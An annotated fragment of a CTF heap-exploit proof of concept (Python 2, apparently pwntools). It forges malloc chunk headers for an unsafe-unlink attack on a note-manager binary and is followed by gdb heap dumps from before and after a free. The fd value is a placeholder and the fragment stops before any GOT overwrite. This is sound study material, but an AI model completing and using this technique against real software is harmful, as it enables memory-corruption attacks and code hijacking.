# CTF heap-exploit PoC fragment: allocates three notes, frees them, then
# allocates one large note whose bytes lay out hand-built malloc chunk
# headers, and finally frees an adjacent note.  The helpers new_note /
# delete_note / list_note and p64 are defined elsewhere (p64 is presumably
# pwntools).  Concatenating str literals with p64() output only works on
# Python 2; under Python 3 every "..." literal here would have to be b"...".
# The two gdb dumps following this snippet show the heap before and after
# the final delete_note(1).
notelen = 0x80  # user-data size of each note; with the 0x10 header each chunk is 0x90
#new_note("/bin/sh\x00"+"A"*(notelen-8))
new_note("A"*notelen)  # note 0
new_note("B"*notelen)  # note 1
new_note("C"*notelen)  # note 2
# Free all three; the "after" dump shows a single 0x190-sized chunk (size
# field 0x191) where these lived, i.e. the three 0x90 chunks were coalesced
# and the 0x180-byte payload below was carved from that region.
delete_note(2)
delete_note(1)
delete_note(0)
fd = 0x11111111 # placeholder standing in for the note-table address; both dumps
                # show this exact value in the fake chunk's fd slot, so this run
                # only verifies layout.  Any allocator that validates the list
                # links on unlink (glibc's "corrupted double-linked list" check,
                # fd->bk == P && bk->fd == P) aborts on such a placeholder.
bk = fd + 0x8   # bk slot, 8 bytes past fd
payload = ""
# Fake chunk 1 (exactly notelen = 0x80 bytes):
#   prev_size = 0, size = 0x81 (0x80 | PREV_INUSE), fd, bk, then 0x60 bytes of 'A'.
payload += p64(0x0) + p64(notelen+1) + p64(fd) + p64(bk) + "A" * (notelen - 0x20)
# Fake chunk 2 header + body (0x90 bytes):
#   prev_size = 0x80 (points back at fake chunk 1), size = 0x90 with PREV_INUSE
#   clear, so the allocator treats the preceding fake chunk as free.
payload += p64(notelen) + p64(notelen+0x10) + "A" * notelen
# Fake chunk 3 header (0x70 bytes): prev_size = 0, size = 0x91, zero padding.
# Total payload: 0x80 + 0x90 + 0x70 = 0x180 bytes, matching the 0x191 chunk
# visible in the "after" dump.
payload += p64(0) + p64(notelen+0x11)+ "\x00" * (notelen-0x20)
new_note(payload)  # becomes note 0 again (allocated from the coalesced region)
list_note()        # helper defined elsewhere; presumably prints the notes
# The gdb dumps below bracket this call ("之前" = before, "之后" = after).
# Note that the heap base differs between the two dumps (0x1e4d... vs
# 0x2393...), so they presumably come from two separate runs under ASLR.
delete_note(1)
# Address the author labels free@GOT; unused in this excerpt, so the script
# presumably continues past what is shown.  A fixed 0x602018 implies a
# non-PIE binary -- PIE plus RELRO would leave no fixed, writable GOT slot.
free_got = 0x602018
delete_note(1)之前 (heap dump before the call):
0x1e4d830: 0x00000000 0x00000000 0x00000081 0x00000000
0x1e4d840: 0x11111111 0x00000000 0x11111119 0x00000000
0x1e4d850: 0x41414141 0x41414141 0x41414141 0x41414141
0x1e4d860: 0x41414141 0x41414141 0x41414141 0x41414141
0x1e4d870: 0x41414141 0x41414141 0x41414141 0x41414141
0x1e4d880: 0x41414141 0x41414141 0x41414141 0x41414141
0x1e4d890: 0x41414141 0x41414141 0x41414141 0x41414141
0x1e4d8a0: 0x41414141 0x41414141 0x41414141 0x41414141
0x1e4d8b0: 0x00000080 0x00000000 0x00000090 0x00000000
0x1e4d8c0: 0x41414141 0x41414141 0x41414141 0x41414141
0x1e4d8d0: 0x41414141 0x41414141 0x41414141 0x41414141
0x1e4d8e0: 0x41414141 0x41414141 0x41414141 0x41414141
0x1e4d8f0: 0x41414141 0x41414141 0x41414141 0x41414141
0x1e4d900: 0x41414141 0x41414141 0x41414141 0x41414141
0x1e4d910: 0x41414141 0x41414141 0x41414141 0x41414141
0x1e4d920: 0x41414141 0x41414141 0x41414141 0x41414141
0x1e4d930: 0x41414141 0x41414141 0x41414141 0x41414141
0x1e4d940: 0x00000000 0x00000000 0x00000091 0x00000000
0x1e4d950: 0x00000000 0x00000000 0x00000000 0x00000000
0x1e4d960: 0x00000000 0x00000000 0x00000000 0x00000000
0x1e4d970: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---
0x1e4d980: 0x00000000 0x00000000 0x00000000 0x00000000
0x1e4d990: 0x00000000 0x00000000 0x00000000 0x00000000
0x1e4d9a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x1e4d9b0: 0x43434343 0x43434343 0x00020651 0x00000000
0x1e4d9c0: 0x43434343 0x43434343 0x43434343 0x43434343
0x1e4d9d0: 0x00000000 0x00000000 0x00020631 0x00000000
0x1e4d9e0: 0x00000000 0x00000000 0x00000000 0x00000000
delete_note(1)之后 (heap dump after the call):
0x2393820: 0x00000000 0x00000000 0x00000191 0x00000000
0x2393830: 0x00000000 0x00000000 0x00000081 0x00000000
0x2393840: 0x11111111 0x00000000 0x11111119 0x00000000
0x2393850: 0x41414141 0x41414141 0x41414141 0x41414141
0x2393860: 0x41414141 0x41414141 0x41414141 0x41414141
0x2393870: 0x41414141 0x41414141 0x41414141 0x41414141
0x2393880: 0x41414141 0x41414141 0x41414141 0x41414141
0x2393890: 0x41414141 0x41414141 0x41414141 0x41414141
0x23938a0: 0x41414141 0x41414141 0x41414141 0x41414141
0x23938b0: 0x00000080 0x00000000 0x00000090 0x00000000
0x23938c0: 0x41414141 0x41414141 0x41414141 0x41414141
0x23938d0: 0x41414141 0x41414141 0x41414141 0x41414141
0x23938e0: 0x41414141 0x41414141 0x41414141 0x41414141
0x23938f0: 0x41414141 0x41414141 0x41414141 0x41414141
0x2393900: 0x41414141 0x41414141 0x41414141 0x41414141
0x2393910: 0x41414141 0x41414141 0x41414141 0x41414141
0x2393920: 0x41414141 0x41414141 0x41414141 0x41414141
0x2393930: 0x41414141 0x41414141 0x41414141 0x41414141
0x2393940: 0x00000000 0x00000000 0x00000091 0x00000000
0x2393950: 0x00000000 0x00000000 0x00000000 0x00000000
0x2393960: 0x00000000 0x00000000 0x00000000 0x00000000
0x2393970: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---
0x2393980: 0x00000000 0x00000000 0x00000000 0x00000000
0x2393990: 0x00000000 0x00000000 0x00000000 0x00000000
0x23939a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23939b0: 0x43434343 0x43434343 0x00020651 0x00000000
0x23939c0: 0x43434343 0x43434343 0x43434343 0x43434343